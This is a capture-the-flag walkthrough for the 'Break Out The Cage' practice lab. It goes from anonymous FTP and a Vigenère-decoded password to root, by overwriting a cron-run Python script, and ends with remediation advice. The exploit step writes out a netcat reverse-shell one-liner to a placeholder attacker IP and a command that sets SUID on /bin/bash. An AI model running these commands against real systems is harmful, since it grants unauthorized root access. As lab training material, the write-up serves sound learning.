Target IP: cage.thm (Requires /etc/hosts entry) Difficulty: Easy/Medium Objective: User (user.txt) & Root (root.txt) Flags

1. Executive Summary

“Break Out The Cage” requires identifying credentials hidden in plain sight via Anonymous FTP to gain initial access. Lateral movement to the user cage is achieved by analyzing internal emails and decoding a Vigenère Cipher using a context-clue key (“FACE”). Privilege escalation to root exploits a Python script running as a cron job that is writable by the cage user, allowing for code injection.

Key TTPs (MITRE ATT&CK):

  • T1078 (Valid Accounts): Anonymous FTP to retrieve credentials.
  • T1027 (Obfuscated Files or Information): Decoding Vigenère ciphers.
  • T1053 (Scheduled Task/Job): Exploiting a writable Cron script.
  • T1574 (Hijack Execution Flow): Modifying a script executed by Root.

2. Operational Setup

Host Configuration

echo "10.10.x.x cage.thm" | sudo tee -a /etc/hosts

Workspace (Tmux)

  • Pane 1 (Recon): nmap, ftp.
  • Pane 2 (Shell): SSH connections.
  • Pane 3 (Tools): CyberChef (in browser) or python for decoding.

3. Enumeration: “The Legend”

A. Network Scanning

nmap -sC -sV -oA nmap/cage cage.thm

Results:

  • 21/tcp (FTP): vsftpd 3.0.3 -> Anonymous Allowed.
  • 22/tcp (SSH): OpenSSH 7.6p1.
  • 80/tcp (HTTP): Apache. Website dedicated to Nicolas Cage.

B. FTP Enumeration (Initial Access)

Anonymous FTP is the obvious entry point.

ftp cage.thm
# User: anonymous, Pass: anonymous
ls -la
get dad_tasks

Analyzing dad_tasks: The file contains a to-do list and a very long string at the bottom:

In case I forget… Mydadisghostrideraintthatcoolnocausehesonfirejokes

This looks like a passphrase. The username associated with the file owner (from ls -la) or context from the website is likely weston (Nicolas Cage’s son).

Credentials Found:

  • User: weston
  • Password: Mydadisghostrideraintthatcoolnocausehesonfirejokes

4. Lateral Movement: The Cipher

A. SSH Access

We log in as Weston.

ssh weston@cage.thm

Note: The terminal immediately starts getting spammed with Broadcast messages (Wall).

“AHHHHHHH THEEEEE BEEEEESSSS!!!!!!!!”

This noise confirms a script is running periodically in the background.

B. Enumerating Emails

We find a directory email_backup in Cage’s home folder (or readable by Weston). cat email_1, email_2, email_3.

Email 3 Analysis:

…Sean left a note on his desk… *The note said: haiinspsyanileph* The guy also seems obsessed with my face lately. He came him wearing a mask of my face…

This is a classic setup for a Vigenère Cipher.

  1. Ciphertext: haiinspsyanileph
  2. Key: FACE (Derived from the emphasis on “face” and the movie Face/Off mentioned in Email 1).

Decryption: You can use CyberChef or a simple tool.

  • haiinspsyanileph + Key FACE = cageisnotalegend

C. Switching User

su cage
# Password: cageisnotalegend

Status: We are now user cage.


5. Privilege Escalation: The Script

A. Identifying the Noise

The broadcast messages are coming from somewhere. We check running processes or search for scripts.

ps aux | grep python
# or
ls -la /opt

We find a hidden directory: /opt/.dads_scripts.

Inside is a python script: spread_the_quotes.py.

B. Analyzing Permissions

ls -l /opt/.dads_scripts/spread_the_quotes.py
# -rwxrwxr-x 1 root cage 234 ... spread_the_quotes.py

Critical Misconfiguration:

  • Owner: root (It runs as root, hence the broadcast messages).
  • Group: cage.
  • Permissions: rwx for Group.

The user cage can write to this file. Since root executes it periodically (Cron), any code we put in there will run as root.

C. The Exploit

We replace the script with a reverse shell or a permission change.

Option 1: Reverse Shell

echo "import os; os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.x.x 4444 >/tmp/f')" > /opt/.dads_scripts/spread_the_quotes.py

Option 2: SUID Bash (Easier/More Stable)

echo "import os; os.system('chmod u+s /bin/bash')" > /opt/.dads_scripts/spread_the_quotes.py

D. Execution

Wait 1-2 minutes for the cron job to trigger. If you used Option 2:

ls -la /bin/bash
# -rwsr-xr-x 1 root root ... /bin/bash  <-- SUID bit set!
/bin/bash -p

Result:

# whoami
root

Root Flag: /root/email_backup/email_master (contains the flag THM{...}).


6. Remediation (Blue Team)

  1. File Permissions:
  • Scripts executed by Root (via Cron or Systemd) must never be writable by standard users.
  • Fix: chown root:root spread_the_quotes.py and chmod 700 spread_the_quotes.py.
  1. Sensitive Data Storage:
  • Passwords and keys should not be stored in plaintext files (dad_tasks) accessible via Anonymous FTP.
  1. Disable Anonymous FTP:
  • Set anonymous_enable=NO in vsftpd.conf.